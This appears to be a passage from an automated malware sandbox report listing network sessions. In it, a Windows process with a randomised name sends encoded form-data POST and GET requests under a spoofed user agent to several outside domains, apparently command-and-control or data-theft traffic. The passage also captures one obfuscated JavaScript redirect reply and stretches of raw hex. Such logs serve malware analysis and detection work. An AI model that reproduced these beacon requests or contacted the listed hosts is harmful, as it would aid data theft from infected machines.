                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 30 4a 57 6e 78 4f 50 2f 6d 67 48 69 63 7a 5a 49 73 35 52 58 55 7a 41 67 2f 55 57 37 57 56 4d 2f 67 3d
                                                                  Data Ascii: BTPDLZX=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfG0JWnxOP/mgHiczZIs5RXUzAg/UW7WVM/g=
                                                                  Dec 4, 2024 12:50:41.691081047 CET | 682 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:41 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br
                                                                  Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 9a d0 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 0d c1 3c 0e 1a 42 dc d6 79 d5 6e fa f7 6d af da 71 8c 42 ac 23 22 6b ff d9 fe be 84 39 6c 40 88 e2 8b 4b 09 34 88 88 5c 76 d9 1b 12 fa 5f 6f cf 68 80 fe 03 b6 a5 10 d6 28 9f 2b 43 08 f5 5c c9 d2 49 26 0a e5 ad 50 b9 e5 10 61 6b f3 5a 95 8c 73 47 43 08 a5 74 4c 29 5e aa 5c 28 2a 4a 61 b9 6a 97 f9 00 b9 c7 4c 48 27 7c 49 8c 27 92 52 45 0a c7 4d e1 49 e0 32 e4 8c 95 7c c4 95 9f b8 6d a3 27 80 29 0d 7f 7f 97 61 b1 d4 30 46 1a 22 d8 f9 eb fb 8f d4 07 37 df 4d 97 91 c3 14 1b 6c 11 8a 61 05 22 f3 43 dd ea [TRUNCATED]
                                                                  Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]<BynmqB#"k9l@K4\v_oh(+C\I&PakZsGCtL)^\(*JajLH'|I'REMI2|m')a0F"7Mla"C0`$.a!DC@Vupv&R8@^G3F%-7(-`2oJF(SJ3J30


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  15 | 192.168.2.4 | 49853 | 185.27.134.144 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:43.139472008 CET | 10850 | OUT | POST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6d 4d 71 4e 55 34 36 42 41 5a 66 4c 4e 4b 64 4a 68 45 59 50 59 63 4e 4d 6a 51 4c 64 77 69 2f 50 71 4f 42 4f 36 38 48 69 57 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 36 6e 75 58 44 76 57 77 71 4d 68 35 79 2f 67 59 59 75 44 7a 75 76 62 70 4a 65 73 7a 71 39 6e 78 41 6a 58 4c 6e 63 47 53 2f 42 4f 43 67 50 6e 4d 52 50 6d 4e 48 70 4a 31 50 2b 42 72 39 4d 76 69 57 2b 5a 58 77 53 34 45 78 69 43 6f 30 55 46 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:50:44.412031889 CET | 682 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:44 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.4 | 49862 | 185.27.134.144 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:45.873195887 CET | 482 | OUT | GET /d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:47.033354044 CET | 1173 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 972
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("356c5d81ad1622917c4a7d1e46e03384");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  17 | 192.168.2.4 | 49879 | 104.21.95.160 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:52.529640913 CET | 742 | OUT | POST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDVkj+PK2pgBRA3uHZ/1UEMZgrakNEawf0zg==
                                                                  Dec 4, 2024 12:50:54.112263918 CET | 910 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:53 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnGooNiaR4%2FuFTm2O4Sm6jt2AkaVja2pFOJUbf3%2FwjQfPpmP%2Fyr76jgBmlLcCWtXYzVYWqIAIX5vITbrQgjG4kkP855rgiZI7sH%2FCQcn0MFLuLMWmC%2BbvxWWI4QDBqRn"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94d84ee66a5c-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=742&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  18 | 192.168.2.4 | 49885 | 104.21.95.160 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:55.186243057 CET | 762 | OUT | POST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZEYHjEwXzi9oo9Gb/R0peZXl2od5hQxlcA=
                                                                  Dec 4, 2024 12:50:56.412210941 CET | 908 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:56 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCCU1hvuO5Ucax93Js2%2BHfNo578ShphpbdSlojgMcS04yQHd1VEkvptP3ECS6DahU4csB6chnMc%2B4i2IHv1jUgxbvfbBqAW5s%2BF8WjoCLRYfzDuZ%2BdM1b6zsXgrP4rCw"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94e8a9697295-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.4 | 49891 | 104.21.95.160 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:57.844650030 CET | 10844 | OUT | POST /vg0z/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Origin: http://www.vayui.top
                                                                  Referer: http://www.vayui.top/vg0z/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:59.101582050 CET | 913 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:50:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V36aZKAN2KR4wBamopm6YlmOYJJNGiOg%2FhDWSx8yVpMW7fy9lTW9TQExCaHKs%2BZtmeloqKo%2FDGb8C2HaUGvmxn2wYSPmMcVaTSnFiwdn%2Fs%2B8NJUz4S6uYwBwdNWAl8G"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb94f97c84425d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10844&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.4 | 49897 | 104.21.95.160 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:00.636545897 CET | 480 | OUT | GET /vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.vayui.top
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:02.253109932 CET | 917 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:02 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29QN4nssBjCi6ei6AYTKUd9by5RPCIaRp650AkRc09SPPCdP%2B%2B9RD6n9kFzVAl4UHT2ApV6NLP6Edtp47RiQWwrTAtFVp7pg32xKHRXgeLLgQDnjMvCqyQeFVSX94dg8"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb950afb5d42bd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.4 | 49916 | 104.21.57.248 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:07.776355982 CET | 766 | OUT | POST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNm5VYaTnmqS7U1uo2zN4Rko3aVyOPXRZ9ng==
                                                                  Dec 4, 2024 12:51:09.201139927 CET | 1091 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:09 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sb1ErnMjzzR29hM0XBL129253GiHieYqwYrcSLfMlQbhuEYk9aHS8Rux2WlucpIHKgNqTCSaX3Euhy%2B5PZ0drXjRIg1M%2BiyIh08thSIdBCS7fN7gJ1YZ15tIUD2Sw2xQsyErS6uw2FA%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95378883f78d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1655&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.4 | 49924 | 104.21.57.248 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:10.439372063 CET | 786 | OUT | POST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Ascii: BTPDLZX=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oTpI1H7aSk08tbx3ClyDqbi2MIQn/vp6N8=
                                                                  Dec 4, 2024 12:51:11.872011900 CET | 1098 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:11 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b98QT9qej0L73OyLkjIj%2BijXP5uy5AyhEKTwjwsFG2RvBgsEleE%2B7pA1YMFD9ubpPJPcXkADTu9pnELn1aBhIVZppwMcrpzt1pXyVqPY3Nmxt33HTdSWmR6fRUgaDxMXsvFMVQDDyNc%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ecb95483e1142eb-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  23 | 192.168.2.4 | 49930 | 104.21.57.248 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:51:13.112694979 CET | 10868 | OUT | POST /o362/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.rgenerousrs.store
                                                                  Origin: http://www.rgenerousrs.store
                                                                  Referer: http://www.rgenerousrs.store/o362/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
